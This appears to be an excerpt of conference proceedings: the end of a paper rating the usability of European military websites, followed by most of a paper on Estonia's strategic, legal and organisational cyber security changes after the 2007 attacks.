We started by making a research on the usability of websites, to this end, we referred to the site
http://www.usability.gov, from where it was collected information on the characteristics considered
important for proper construction of a website, as well as for a good and easy relationship with the user of
this site. Moreover it was also consulted and analyzed the book Research-Based Web Design & Usability
Guidelines (Leavitt & Shneiderman, 2007). This research has defined the parameters to evaluate the
sites, and groups were created with the parameters of different areas of analysis: homepage; layout;
pagination and scroll; headers; titles and labels; links; appearance of text; lists; widgets; graphics, images
and multimedia content; organization; and research. As the analysis of sites was done separately by
more than one person, each of which assessed its share of sites of European armed forces, and to avoid
subjectivity in the evaluation, it was registered only if each site met each assessment parameter, by using
a Boolean value (represented by 0 and 1). During the assessment was given to each parameter the
corresponding value, later added with elements of the same group and divided by the number of
parameters resulting in the final value for the group. The values were registered and treated in a spread
sheet, which results are presented later in this article. The final result of the assessment has a minimum
value of 0 and maximum of 8.79. This value results from the sum of the value of all assessed groups,
which results from the sum of the relative importance of each parameter divided by the number of group
parameters.
3. Analysis
The first step of this study was to search all sites of European armed forces for future analysis. One
obstacle encountered was the difficulty in finding the sites intended for analysis, since some armed forces
do not have sites, as is the case of Macedonia and Moldova. Moreover, we also found a site under
construction, Malta, precluding their analysis. Throughout the evaluation we faced with several desktop
environments, some more complex and some more simple, but in general with relative ease of use. To
perform the evaluation we considered the sites of the main branches of the armed forces: army, navy and
air force. In some cases, it was also considered the site of the ministry of defense of the country in
evaluation, because it contains information related to the branches of the armed forces and also links to
the sites of those branches.
3.1 General assessment of all countries
After a qualitative analysis of all sites it was possible for us to verify that the difference between the
values obtained by each country under review has no great difference, as shown in Figure 1.
52

6,00
5,00
4,00
3,00
2,00
1,00
0,00
Albania
Germany
Austria
Pedro Cunha et al.
Obtained scores
ByeloRussia
Belgium
Bosnia and
Bulgaria
Croacia
Denmark
Slovakia
Slovenia
Spain
Estonia
Finland
France
Greece
Netherland
Hungary
Ireland
Italy
Latvia
Lithuania
Luxemburg
Montenegro
Norway
Poland
Portugal
United
Check
Romania
Russia
Serbia
Sweden
Switzerland
Ukraine
Figure 1: Scores of all assessed countries
Speaking in absolute values, the minimum was obtained by Belarus with 3.02 and the maximum score
was obtained by Sweden with 5.49. This represents 34.34% and 62.50% respectively as compared to the
maximum score possible. However, most countries had an assessment within a range between 50% and
60%, with an average of 54.38% compared to the maximum possible score, which indicates a
satisfactory classification of the evaluated sites. This is presented in Figure 2 and in Table 1.
Throughout the analysis it was found that there is a reasonable investment for most European armed
forces on their sites, revealing on average, a good level of information update, a nice graphic layout and
simplicity of use. This shows that there is a technological sensitivity towards a greater need and
willingness to disclose information relevant to society, with the objective, in some cases, to attract new
elements to their forces. Despite there is investment, there is a difference among countries in what
concerns to having only one website for all the branches of the armed forces – Albania, Byelorussia,
Bosnia and Herzegovina, Bulgaria, Croatia, Slovenia, Luxemburg, Check Republic, Russia, Serbia,
Ukraine – representing 32.43% of the countries; or having a website for two of the branches of the armed
forces, sometimes with one for those branches and a global including all of them – Austria, Slovakia,
Hungary, Switzerland – that represent 11.43% of the evaluated websites; or having a website for each
one of the existing branches of the armed forces – Germany, Belgium, Denmark, Spain, Finland, France,
Greece, Netherlands, Ireland, Italy, Latvia, Lithuania, Montenegro, Norway, Poland, Portugal, United
Kingdom, Romania, Sweden – that represent 54.29% of the evaluated websites (Figure 2).
Figure 2: Scores and number of military websites
Table 1: Relative percentage obtained by the assessed countries
Countries % Countries % Countries % Countries %
Albania 57,30% Slovakia 52,70% Ireland 55,00% United Kingdom 57,25%
Germany 61,88% Slovenia 54,24% Italy 57,53% Check Republic 41,41%
Austria 56,57% Spain 58,51% Latvia 49,57% Romania 55,30%
Byelorussia 34,34% Estonia 55,16% Lithuania 58,18% Russia 54,40%
Belgium 55,52% Finland 53,56% Luxemburg 55,53% Serbia 60,68%
Bosnia and Herzegovina 49,02% France 58,24% Montenegro 52,38% Sweden 62,50%
Bulgaria 46,05% Greece 54,88% Norway 54,23% Switzerland 58,97%
Croacia 52,68% Netherland 57,87% Poland 57,69% Ukraine 55,92%
Denmark 54,02% Hungary 48,99% Portugal 55,23%
53

Pedro Cunha et al.
Another obtained value was the percentage of countries that have sites that include recruitment links.
68.57% of the countries have, at least, one website linking to a recruitment page, while 31.43% did not.
3.2 Voluntary Incorporation versus mandatory incorporation
One of the significant elements in this study was the type of adopted incorporation in each one of the
countries: 18 of the evaluated countries have voluntary incorporation, while the other 17 have mandatory
military service.
Despite what was expected, the countries with mandatory service obtained a better average in the
websites evaluation, 55.45%, than the one obtained by those countries that need to convince citizens to
become voluntaries to service: 53.37% (Figure 3).
Figure 3: Scores and number of sites in both mandatory and voluntary incorporation countries
Concerning the number of sites in each of the incorporation regimes, 61.11% of the countries with
voluntary service have several sites, one for each of the armed forces branches, while this happens in
only 47.06% of the countries with mandatory incorporation. This shows that countries with voluntary
incorporation have a higher level of investment in the creation of armed forces websites.
From those countries with one website for each branch of the armed forces, 28.57% have a mandatory
incorporation system, 71.43% have voluntary incorporation, 35.71% are from the Eastern Europe and
64.29% are from the rest of Europe. The countries with a lower investment in the number of websites,
having only one website for all of the military branches, have the following distribution: 56.25% have
mandatory incorporation, 47.35% have voluntary incorporation, 81.25% are from the Eastern Europe and
only 18.75% are from the rest of Europe.
Another significant indicator of the importance that the armed forces websites have in each country is the
existence, or not, of a recruitment link, making it easier to those interested in joining the armed forces to
obtain relevant information to that process and/or register themselves for incorporation. 77.78% of the
countries with voluntary service have an incorporation link, while that happens in 58.82% of the countries
with a mandatory incorporation system.
3.3 Eastern Europe versus Western Europe
During the evaluation it was perceptible the difference in investment, regarding the number of the armed
forces websites and regarding the quality of the existing websites, between Eastern Countries and
Western Countries. This was objectively confirmed by the final results as it can be seen in Figure 4.
Figure 4: Score and number of websites of Western and Eastern Europe countries
54

Pedro Cunha et al.
Although being scarce in some of the information provided, as in providing specific websites for each
branch of the armed forces, the difference between the Eastern Europe countries and the rest of the
European countries in the average classification is not considerable, with the Eastern countries being
classified with 52.00%, while the others have 56.90%. Despite this, there is a big difference in the number
of websites of armed forces for each country, existing a big difference between the number of countries in
Eastern Europe that have only one general website for all the military branches, and the Western Europe
countries in the same situation. Only 27.78% of the Eastern European countries have one website for
each military branch, while 72.22% do not. In the Western Europe the scenario is the opposite, with
82.35% of the countries providing a specific website for each branch of the armed forces. There is also a
great difference between the Eastern and Western European Countries in what concerns to recruitment
links. 88.24% of the Western Europe countries have such a link, while that happens in only 50% of the
Eastern Europe countries.
4. Conclusions
The performed evaluation allows the extraction of several conclusions regarding the web communication
policies of the European countries, through the analysis of the quality of their websites in what concerns
to graphics, usability and contents.
The Spanish website www.soldados.com stands out as an example of quality, in graphics, easiness of
use, completeness of the menus, virtual maps indicating missions, interactive games, etc. Another
demonstration of investment in this field is the Norwegian case. Norway has recently launched another
domain, complementing the domain mil.no with the access through the forsvaret.no domain (forsvaret
means defence). On the other extreme countries like Byelorussia can be found, with a very poorly
constructed website (http://www.mod.mil.by).
The data collected demonstrated that the biggest difference in the Internet communication strategy of the
European countries lay in the number of military websites, where 81.25% of the countries that do not
have one website for each branch of the armed forces is located in the Eastern Europe. It is clearly
proven the existence of a difference in the quality of the military websites of Eastern and Western
European countries.
The differences found have obviously underpinning causes, forcing us to examine and understand not
only the current situation but also what might be the future development of these tools. We cannot ignore,
as the cause of these differences, the conflicts that occurred in Europe over the past 20 years, of which
we highlight the Balkans, Chechnya, Georgia and the war against terrorism, among others, the political
changes associated with German reunification, by the fall of the Berlin Wall, and the collapse of the
former Soviet Union, whose breakup gave rise to a considerable number of independent countries, also
in this paper. These new countries, this time awakened to the need of having armed forces, having
started the process of developing its security and defense.
Looking specifically the countries of Eastern Europe, with few exceptions, the results reflect a constant
that exists in almost all of them. Most countries live from their natural resources, or "rent" their territory for
oil and gas pipelines can reach other sites. This reality contributes to the issue of development of these
countries is tilted in relation to the concern of the necessary for their survival. Thus, the working middle
class, who want strong, not to compromise the country's development, is negligible or nonexistent. The
main difference lies precisely here. To be middle class, there must be education, which will necessarily
lead to development, technology and information. The percentage of ignorance and inability to use these
tools, does not catalyze its development, resulting in that the analysis of several sites turned out worst in
these countries, as compared with other European countries.
Another important and curious issue, concerns the development that has been evident in the armed
forces of the countries of the former USSR. The results show that the sites in these countries,
contributing to a holistic view of the military, because most of them have a single website for all branches
of the Armed Forces. Typically, this view is associated with a form of recruitment based on voluntary,
contradicted, in this case, by the results found. This leads us to conclude that the armed forces of these
countries are rapidly advancing, having already surpassed the old concepts of epirocracy and
thalassocracy, very common in the armed forces of the former USSR, based essentially on a system of
conscription.
55

Pedro Cunha et al.
When classifying countries by their incorporation method, there are smaller differences, both in the
number of websites as in the results of their quality evaluation (the difference in the obtained average
score was of only 2.08%, with advantage to those with mandatory incorporation). It is also noticeable that
there was not a diminishment in the investment in the quality of the military websites in more than 50% of
the countries with mandatory incorporation. This contradicts the initial hypothesis of this work that
expected countries with voluntary incorporation to have higher standards for their websites, as a mean to
better reach their potential candidates.
References
Andreski, S. (1968) Military organization and society. University of California Press.
Bailey, B. (2007) “The Army in the Marketplace: Recruiting an All-Volunteer Force”, The Journal of American History,
Vol 94, No. 1, pp 47 -74.
Castells, M. (2002) The Internet galaxy: reflections on the Internet, business, and society, Oxford University Press.
CIA (2011) “The World Factbook – Europe”, [online], https://www.cia.gov/library/publications/the-worldfactbook/wfbExt/region_eur.html.
Jehn, C., and Selden, Z. (2002) “The end of conscription in Europe?”, Contemporary Economic Policy, Vol 20, No. 2,
pp 93-100.
Leander, A. (2004) “Drafting Community: Understanding the Fate of Conscription”, Armed Forces & Society, Vol 30,
No. 4, pp 571-599.
Leavitt, M.O. and Shneiderman, B. (2007) Research-based web design & usability guidelines, GSA.
Mearsheimer, J.J. (1990) “Back to the Future: Instability in Europe after the Cold War”, International Security, Vol 15,
No. 1, pp 5-56.
Thompson, J. B. (1995) The media and modernity: a social theory of the media, Stanford University Press.
Vagts, A. (1981) A History of Militarism: Civilian and Military, Greenwood Press.
56

Estonia After the 2007 Cyber Attacks: Legal, Strategic and
Organisational Changes in Cyber Security
Christian Czosseck, Rain Ottis and Anna-Maria Talihärm
Cooperative Cyber Defence Centre of Excellence, Tallinn, Estonia
Christian.Czosseck@ccdcoe.org
Rain.Ottis@ccdcoe.org
Anna-Maria.Talihärm@ccdcoe.org
Abstract: At the time of the state-wide cyber attacks in 2007, Estonia was one of the most developed nations in
Europe regarding the ubiquitous use of information and communication technology (ICT) in all aspects of the society.
Relaying on the Internet for conducting a wide range of business transactions was and still is common practice.
Some of the relevant indicators include: 99% of all banking done via electronic means, over a hundred public eservices
available and the first online parliamentary elections in the world. But naturally, the more a society depends
on ICT, the more it becomes vulnerable to cyber attacks. Unlike other research on the Estonian incident, this case
study shall not focus on the analysis of the events themselves. Instead it looks at Estonia's cyber security policy and
subsequent changes made in response to the cyber attacks hitting Estonia in 2007. As such, the paper provides a
comprehensive overview of the strategic, legal and organisational changes based on lessons learned by Estonia
after the 2007 cyber attacks. The analysis provided herein is based on a review of national security governing
strategies, changes in the Estonia’s legal framework and organisations with direct impact on cyber security. The
paper discusses six important lessons learned and manifested in actual changes: each followed by a set of cyber
security policy recommendations appealing to national security analysts as well as nation states developing their own
cyber security strategy.
Keywords: Estonia, cyber attacks, lessons learned, strategy, legal framework, organisational changes
1. Introduction
Over three weeks in the spring of 2007, Estonia was hit by a series of politically motivated cyber attacks.
Web defacements carrying political messages targeted websites of political parties, and governmental
and commercial organisations suffered from different forms of denial of service or distributed denial of
service (DDoS) attacks. Among the targets were Estonian governmental agencies and services, schools,
banks, Internet Service Providers (ISPs), as well as media channels and private web sites (Evron, 2008;
Tikk, Kaska, & Vihul, 2010).
Estonian government’s decision to move a Soviet memorial of the World War II from its previous location
in central Tallinn to a military cemetery triggered street riots in Estonia, violence against the Estonian
Ambassador in Moscow, indirect economic sanctions by Russia, as well as a campaign of politically
motivated cyber attacks against Estonian (Ottis, 2008). By April 28 th the cyber attacks against Estonia
were officially recognized as being more than just random criminal acts (Kash, 2008). The details of the
weeks that followed are described in (Tikk, Kaska, & Vihul, 2010).
The methods used in this incident were not really new. However, considering Estonia’s small size and
high reliance on information systems, the attacks posed a significant threat. Estonia did not consider the
event as an armed attack and thus refrained from requesting NATO’s support under Art. 5 of the NATO
Treaty; instead, the attacks were simply regarded as individual cyber crimes (Nazario, 2007; Tikk, Kaska,
& Vihul, 2010) or “hackitivism” as established by a well-known information security analyst Dorothy
Denning (Denning, 2001). A further discussion on whether or not the 2007 attacks were an armed attack
is beyond the scope of this paper. Many defence and security analysts have covered this particular topic
and discussed e.g. the “juridical notion of information warfare” (Hyacinthe, 2009), a “taxonomies of lethal
information technologies” (Hyacinthe & Fleurantin, 2007), formulated a “Proposal for an International
Convention to Regulate the Use of Information Systems in Armed Conflict” (Brown, 2006), or “legal
limitations of information warfare” (Ellis, 2006).
The incident quickly drew worldwide attention, and media labelled the attacks the first “Cyber War”
(Landler & Markoff, 2007). This led to an overall “cyber war hype” that was continuously carried forward
by media, researchers and policymakers. This exaggerating rhetoric was employed during following
conflicts like Georgia 2008 or Kyrgyzstan 2009, and such misuse of terminology has already received a
fair amount of criticism (Farivar, 2009).
57

Christian Czosseck et al.
The 2007 attacks have shown that cyber attacks are not limited to single institutions, but can evolve to a
level threatening national security. Looking back, the Estonian state was not seriously affected since to a
larger extent state functions and objects of critical information infrastructure were not interrupted or
disturbed (Odrats, 2007). However, nation states did receive a wake-up call on the new threats emerging
from cyber space, alongside with new types of opponents.
The following three sections will provide a comprehensive overview of major changes in Estonia’s
national cyber security landscape, namely the changes of national policy. As a result, several laws and
regulations were introduced, while others were amended, and there were several changes in the
organisational landscape.
This paper features six lessons learned that were identified as most remarkable in the case study of
Estonia. It concludes with several strategic cyber security recommendations.
2. Development of national strategies
The benefits as well as threats of the use of Internet-related applications to information societies are
identified by a number of Estonian high level policies and strategies.
The Estonian Information Society Strategy 2013 (MoEAC, 2006), in force since January 2007, promotes
the broad use of ICT for the development of a knowledge-based society and economy. Given that cyber
attacks on a scale matching that of Estonia in 2007 were unseen and likely unpredicted so far, it is not
surprising that the risk of massive cyber attacks was not taken into serious consideration in the strategy –
nor in other national policy documents from that era (see e.g. the implementation plan of the Information
Society Strategy for 2007-2008, MoEAC, 2007)
The National Security Concept of Estonia published in 2004 (MoD, 2004) and the government's action
plan in force at this time (Estonian Government, 2007) were no exception since these documents did not
even mention possible cyber threats or related actions.
It was only after the 2007 cyber attacks that cyber security instantly found its way into the national
security spotlight.
2.1 Policy and strategy responses since 2007
In July 2007, shortly following the cyber attacks, the Government approved the Action Plan to Fight
Cyber-attacks (Kaska, Talihärm, & Tikk, 2010). In September 2007, the revised Implementation Plan
2007-2008 of the Estonian Information Society Strategy 2013 (MoEAC, 2007) was approved. The
document holds a generic statement that critical information infrastructure should be developed in such a
way that it operates smoothly in “emergency situations” (MoI 2009).
2.1.1 Cyber security strategy
In May 2008, the Estonian government adopted the newly drafted Cyber Security Strategy (CSS) as a
comprehensive policy response to the cyber attacks. The strategy was prepared by a multi-stakeholder
committee including relevant ministries, agencies and private sector representatives.
The CSS considers cyber security a national effort responding to the asymmetric threat posed by cyber
attacks. The strategy underlines that state-wide cyber security requires active international cooperation
and the promotion of global responses. On a national level, the strategy suggests implementing
organisational, technical and legal changes. Further, it aims at developing an over-arching and
sophisticated cyber security culture (MoD, 2008).
Based on a post-attack assessment of the situation in Estonia, the CSS identified five strategic
objectives:
The development and large-scale implementation of a system of security measures;
Increasing competence in cyber security;
Improvement of the legal framework for supporting cyber security;
Bolstering international cooperation; and
Raising awareness on cyber security.
58

Christian Czosseck et al.
In May 2009, the CSS implementation plan for the 2009-2011 cycle was adopted by the government. The
plan called for concrete actions in five priority areas and became the main source for the comprehensive
cyber security approach in Estonia (Estonian Government, 2009).
2.1.2 National Security Concept
The National Security Concept, which was updated and approved in May 2010, represents Estonian
government’s second major cyber security policy response. It recognizes Estonia’s growing reliance on
ICT along with the increasing threat posed by terrorists and organised crime groups. Cyber crime should
receive special attention, and solutions are to be found in co-operation between agencies on both
national and international level. Cyber security shall be ensured by “[...] reducing vulnerabilities of critical
information systems and data communication connections”. Critical systems shall stay operational, even
if the connection to foreign countries is temporarily malfunctioning or has ceased to function. To support
these actions, the necessary legislation should be developed and public awareness raised (MoD, 2010).
The National Security Concept led to the revised Guidelines for Development of Criminal Policy until
2018, published in October 2010. The Police shall focus on preventing the spread of malware and the
growing number of “hacking” incidents. Furthermore “[t]he existence of a sufficient number of IT
specialists in law enforcement agencies shall be ensured in order to set bounds to cyber crime more
efficiently.” (MoJ, 2010). Other strategies like the Estonian Information Society Strategy 2007-2013 have
received only minor cyber security related amendments.
In addition, since the 2007 attacks, Estonia has become one of the major advocates of cyber security on
the international level. As one result, NATO initiated the development of a unified strategy against cyber
attacks (Blomfield, 2007) and in 2010 NATO adopted the new strategic concept that recognizes cyber
attacks as a threat to the alliance and opts for the enhancement of alliance’s and nations’ capabilities to
face the threat (NATO, 2010).
Moreover, Estonia has actively supported a number of international organisations such as the Council of
Europe in its fight against cyber crime (MoFA, 2010a), Association of Southeast Asian Nations in
promoting the harmonization of laws concerning cyber crime (MoFA, 2010b) and United Nations in
contributing an expert to the task force on Developments in Information and Communication Technology
in the Context of International Security (MoFA, 2010c).
3. Development in the legal field
The 2007 attacks prompted major changes in the Estonian legislative landscape and in some cases
enhanced the changes already underway. Legal amendments involved several areas of law related to
cyber security (see Table 1): criminal law (including aspects of criminal procedure) and crisis
management law. The Estonian incident did not, however, directly touch upon the legal regime applicable
to armed conflicts since the attacks were treated by national authorities as acts of crime.
Other laws such as the Electronic Communications Act were also updated but did not involve
considerable changes in the context of cyber security (Estonian Government, 2010). Table 1.(Kaska,
Talihärm, & Tikk, 2010)
Table 1: Law related to cyber security
Constitutional law
Fundamental rights and freedoms;
Organisation of the state;
Execution of public authority
Private law Public administrative law Criminal law
Information society services
eComms
infrastructure provision
Provision of eComms services to
end users
General private law supporting the
functioning of information society
(eCommerce, digital signatures)
General administrative procedure
law supporting the accessibility of
information society
Availability of public information
and public e-services
Data processing and data
protection
59
Substantive
criminal law
Criminal
procedure law
International
cooperation
Crisis management
law
Critical infrastructure
protection (CIP)
Critical information
infrastructure
protection (CIIP)
War-time law /
national defence law
National defence
organisation
National defence in
peacetime
National
defence in
conflict/wartime

3.1 Penal code
Christian Czosseck et al.
Mostly due to the need to harmonize the Estonian Penal Code with the Council of Europe Convention on
Cyber Crime (Council of Europe, 2001) and the Council Framework Decision 2005/222/JHA of on attacks
against information systems (Council of Europe, 2005) all cyber crime related provisions in the Penal
Code were reviewed. The amendments targeted the provisions addressing attacks against computer
systems and data, widened the scope of specific computer crime provisions (e.g. criminalizing the
dissemination of spyware and malware), added a new offence of the preparation of cyber crimes,
modified the provision concerning acts of terrorism and filled an important gap (Estonian Government, n
d) in the Penal Code by enabling differentiation between cyber attacks against critical infrastructure (with
the purpose of seriously interfering with or destroying the economic or social structure of the state) and
ordinary computer crime (MoI, 2009).
3.2 Amendments relevant to criminal procedure law
The amendments in the Penal Code resulted partly from the regulatory limitations that arose in relation to
the application of the Code of Criminal Procedure (CCP) to the 2007 attacks (MoJ, 2010b) as CCP §§
110-112 maintain that evidence may be collected by surveillance activities in a criminal proceeding if the
collection of evidence is a) precluded or especially complicated and b) the criminal offence under
investigation is, at the minimum, an intentionally committed crime for which the law prescribes a
punishment of at least three years’ imprisonment (MoJ, 2010b). However, during the Estonian attacks in
2007 it became apparent that almost none of the committed offences met the threshold of “three years”
imprisonment and that precluded the employment of surveillance measures (Estonian Government,
2007b). Therefore, the changes in the Penal Code prescribed higher maximum punishments and also
corporate liability for cyber crime offences.
3.3 New Emergency Act
The new Emergency Act (EA) (MoI, 2009) was adopted in June 2009 and reviewed the current setup of
national emergency preparedness and emergency management structure, including the responses to
cyber threats.
Offering a comprehensive approach, the act foresees a system of measures which include preventing
emergencies, preparing for emergencies, responding to emergencies and mitigating the consequences of
emergencies (“crisis management”) (MoI, n d). It is the providers of public services and information
infrastructure owners that are tasked with everyday emergency prevention and ensuring the stable level
of service continuity. Providers of vital services are obliged, among other assignments, to prepare and
present a continuous operation risk assessment (EA § 38) and an operation plan (EA § 39) to notify the
citizens about events significantly disturbing service continuity as well as to provide the necessary
information to supervisory bodies. In addition to the above, there are certain provisions that specifically
address threats against information systems, such as an obligation for the providers of vital services to
guarantee the smooth application of security measures in information systems and information assets
used for the provision of vital services.
4. Development of organisations
Before the 2007 cyber attacks Estonia had relatively few organisations dedicated to (national) cyber
defence. Since then, Estonia has made some key organisational changes to better deal with the cyber
threats. The most significant ones are described below.
A high level organisational change was the formation of the Cyber Security Council under the
Government Security Committee, a body foreseen by the National Cyber Security Strategy. The Council
reports directly to the Government Security Committee and is therefore well-placed for coordinating interagency
and international cyber incident response.
4.1 EIC, CERT-EE and CIIP
Estonian Informatics Centre (EIC) is a state agency that is responsible for managing and developing
public information services and systems (MoEAC, 2009). It is also tasked with providing cyber security for
these services and systems. Even though a national CERT had been established in 2006 as a
department of the EIC, its capabilities and experience were still quite modest at the time of the attacks. In
2009, as a result of the National Cyber Security Strategy, the Department of Critical Information
60

Christian Czosseck et al.
Infrastructure Protection (CIIP) was added to the structure of EIC, in addition to the already existing
CERT. The main tasks of the new department include supervising risk analyses of critical information
infrastructures and developing protective measures.
4.2 Cyber defence league
During the cyber attack campaign, the Estonian CERT was assisted by an informal network of volunteer
cyber security experts. This provided much needed additional capabilities, such as increased situational
awareness, analysis capability, quick sharing of defensive techniques between targeted entities, as well
as an extended network of direct contacts to international partners.
The roots of this informal group derive from the late 1990ies, when Estonia was adopting a national ID
card system. Over the years, the network of professionals had also cooperated against criminally
motivated cyber attacks targeting critical infrastructures (e.g., Estonian banks). A later development was
the formalisation of this loose cooperation into the Cyber Defence League (CDL) in 2009. The Defence
League is a volunteer national defence organization in the military chain of command. The CDL is part of
the Defence League and unites cyber security specialists who are willing to contribute their time and skills
for the protection of the high-tech way of life in Estonia, especially assisting the defence of critical
information infrastructure. It is important to note that this is a defensive organisation, not designed to
harass political adversaries in (anonymous) cyber attack campaigns. In January 2011, the CDL was
reorganized into the Cyber Defence Unit of the Defence League, but the CDL name is still widely used.
CDL’s key activities include organizing training and awareness events, as well as cyber defence
exercises. In 2010, the CDL was involved with the Baltic Cyber Shield exercise organised by Cooperative
Cyber Defence Centre of Excellence (Geers, 2010), the US-led International Cyber Defence Workshop,
as well as a series of national exercises. The CDL is a good example of managing in a productive
manner the expertise and enthusiasm of motivated cyber security specialists.
5. Six recommendations
Given that the major changes have been discussed above, the next section will feature six significant
lessons learned from the 2007 cyber attacks against Estonia:
5.1 Comprehensive strategy approach
It is evident that Estonia has taken into account the lessons learned from the 2007 incident, the most
significant step being the quick establishment of a comprehensive policy response which has led to the
adoption and subsequent implementation of the national Cyber Security Strategy. The Estonian example
emphasises the need for nation-wide cooperation and countermeasures against cyber crime, involving
major stakeholders of the public and private sector.
It remains to be debated whether cyber security should be handled in a single comprehensive strategy or
form a sub-section of all other relevant strategies touching upon ICT. However, considering the speed of
technological advancements and comparing it with the speed of developing national strategies, the
Estonian approach of having a single strategy might be the one more advisable.
The 2007 attacks triggered the cyber security strategy drafting in Estonia. However, countries should not
wait for such triggers and should pro-actively conduct a thorough and comprehensive risk assessment of
their cyber infrastructure. Furthermore, often only the context and additional information will reveal if the
attack was launched with crime, espionage, terrorism or military motivation. Therefore, close cooperation
between relevant agencies remains a sine qua non to success in this arena.
5.2 Politically motivated cyber attacks
Another aspect to consider is the shift of attention in terms of cyber security threats over the last decade.
While the first half of the decade the cyber security focus was on criminal and espionage attacks (if
recognised as a national security issue at all), the second half witnessed a surge in politically motivated
cyber attacks (Nazario, 2009). The significance of this development is that targets have transformed. A
politically motivated attacker is likely to attack visible and politically significant targets (such as the public
website of a government agency or a company that has angered an interest group), which are of little
interest to criminals and intelligence agencies. This shift in targets requires everyone to reassess their
risks and security requirements.
61

Christian Czosseck et al.
Politically motivated actors can cover the entire spectrum of cyber attack, from high-profile strikes against
critical infrastructure, to millions of pinprick attacks that can weaken the state over a long period of time
(Lemay, Fernandeza, & Knight, 2010; Liles, 2010; Ottis, 2009). As the threat of politically motivated
attacks threatening national security is not likely to go away in the foreseeable future, it must be
addressed as a national security issue in order to get the full attention of policymakers.
5.3 Legal recommendations
An analysis of the Estonian legal order governing the domain of information society underlines that a
secure information society needs to be comprehensively supported by norms involving several legal
disciplines. The broad approach illustrated by the Estonian legal framework brings together the areas of
private and public law, and completes the spectrum of cyber incident regulation by engaging criminal law,
crisis management regulation and wartime law/national defence legal order. It is vital for countries to
realize that the international cyber security regulation involves a wide range of legal areas and the review
of relevant regulatory frameworks and the identification of possible uncovered “grey areas” is highly
recommended.
Within national legal systems, a review of criminal law (penal law) appears to be a central issue. Attacks
against critical (information) infrastructure, politically motivated cyber attacks, possible cases of cyber
terrorism, as well as related provisions for investigation and prosecution, should all be reflected in the
domestic criminal law or other national acts. Broad and inclusive national implementation of the Council
of Europe Convention on Cybercrime is of crucial importance, especially considering the cross-border
nature of cyber crime.
Additionally, the Estonian experience underlined the need to establish common security standards for all
computer users, information systems and critical infrastructure companies (MoD, 2008). By 2011, steps
have been taken to establish such standards for service providers within the framework of the Electronic
Communications Act, but more detailed rules for end-users’ conduct and/or legal obligations are still
needed.
5.4 Exercises and education for the masses
A key component of enhancing (national) cyber security is cyber security awareness and education. This
should not be limited to professionals in governmental or private institutions, but must cover the whole
spectrum from a citizen using ICT for everyday things to senior policy makers, considering the skills and
knowledge needed at every level. This includes law enforcement agencies and especially the judicial
system that has a central role in interpreting the regulatory aspects of cyber security. By developing
different solutions well suited for each groups, a broad and sophisticated cyber security culture can be
implemented, as aimed for in the CSS.
Estonia recognized its lack of sufficient number of well-trained information security experts and
developed a new Master’s program for Cyber Security Studies in 2008. The Cyber Defence League is
another venue for actively training experts in cyber security. Further measures, such as information
campaigns for the secure use of the Internet, special classes in high school or vocational training should
be considered by Estonia and other nation states.
Additionally, cyber security exercises organised both on national and international level serve as effective
preparation to respond to cyber attacks. Exercises like Cyber Europe 2010 (ENISA, 2010) require
efficient coordination between agencies and private shareholders and should be regularly conducted.
5.5 International relations
The attacks against Estonia in 2007 underlined the importance of international cooperation as it became
even more apparent that in the context of responding to cyber threats, one country can do little alone. To
that end, active participation in the work of major organizations dealing with cyber security requires
keeping national developments and legal framework up to date and serves as a useful ground for new
initiatives, further collaboration and regional or global forum. Moreover, the ratification of instruments
such as the Council of Europe Convention of Cyber Crime that aim to harmonise cyber crime regulation
worldwide should be supported and promoted.
62

Christian Czosseck et al.
Beside the political will for cooperation, national multi- and bilateral agreements, information sharing
agreements, cooperation of law enforcement agencies, joint investigation teams, international exercises,
formal and informal networks and other international initiatives are vital for effective prosecution and
investigation of cyber crime offences.
5.6 Harnessing the volunteers
It is well known that most of the Internet infrastructure is owned and operated by the private sector. It
follows that there is a pool of experts in the private sector, who could provide a meaningful contribution to
national cyber security, regardless of their actual position in the private sector. This also includes experts
in the public sector, who do not work in their area of expertise. Clearly, there are limits to the use of
volunteers, whether their potential role is in offensive or defensive activities (Ottis, 2009). However, if
proper legal, policy and operational frameworks are in place, volunteers can significantly increase
national cyber security capability.
6. Conclusions
While in hindsight, the cyber attacks against Estonia were not as severe as often referred to, they still
triggered an understanding of threats from cyber space as threats potentially affecting national security
and prompted a wake-up call concerning the risks associated with the “careless use” of digital information
technologies (e.g., Internet). For instance, the risk posed by politically motivated individuals should be
regarded as a possible element of a serious threat to cyber security. By reviewing the strategic, legal and
organisational changes that Estonia has undergone after the 2007 cyber attacks, this paper provides a
concise list of key changes that have taken place on the legislative and administrative levels. While this
paper describes some new assets that so far appear to be unique to Estonia, such as the formation of the
Cyber Defence League, it offers several recommendations to national security planners performing
beyond Estonia’s national boundaries. Many of the aforementioned recommendations are not new; but
they have passed a practical test through the real-life Estonian case study. Accordingly, these
recommendations are more than a set of purely theoretical proposals. Lastly, based on the foregoing
analysis, it is important to stress the fact that cyber security of a nation state can only be achieved by an
interlocked approach covering national policies, its legal framework and organisations involving both
public and private actors, as well as necessary changes identified by a realistic risk assessment.
Disclaimer
The opinions expressed here are those of the authors and should not be considered as the official policy
of the Cooperative Cyber Defence Centre of Excellence or NATO.
Acknowledgement
We would like Mrs. Kadri Kaska and the unknown reviewer for their substantial comments they provided
us with in the course of writing this paper.
References
Blomfield, A. (2007). Estonia calls for Nato cyber-terrorism strategy. Retrieved from
http://www.telegraph.co.uk/news/worldnews/1551963/Estonia-calls-for-Nato-cyber-terrorism-strategy.html.
Brown, D. (2006) “A Proposal for an International Convention to Regulate the Use of Information Systems in Armed
Conflict”, Harvard International Law Journal, 47 (1), 179-221.
CDL. (n.d.). Cyber Defence League. Retrieved from http://www.kaitseliit.ee/index.php?op=body&cat_id=395.
Council of Europe. (2001). Convention on Cybercrime. Retrieved from
http://conventions.coe.int/treaty/en/treaties/html/185.htm.
Council of Europe. (2005). Council Framework Decision 2005/222/JHA of 24 February 2005 on attacks against
information systems. Official Journal L 69, 67-71.
Denning, D. E. (2001). Activism, hacktivism, and cyberterrorism: the internet as a tool for influencing foreign policy.
Networks and netwars: The future of terror, crime, and militancy, 239–288.
Ellis, B. (2001) “The International Legal Implications and Limitations of Information Warfare: What Are Our Options?”.
Retrieved Mar. 2, 2011 from http://www.iwar.org.uk/law/resources/iwlaw/Ellis_B_W_01.pdf.
ENISA. (2010). EU Cyber Security Exercise ’Cyber Europe 2010’. Retrieved January 31, 2011, from
http://www.enisa.europa.eu/media/press-releases/cyber-europe-20102019-cyber-security-exercise-with-320-
2018incidents2019-successfully-concluded.
Estonian Government. (2007a). Programme of the Coalition for 2007-2011.
Estonian Government. (2007b). Explanatory Memorandum to the Draft Act on the Amendment of the Penal Code
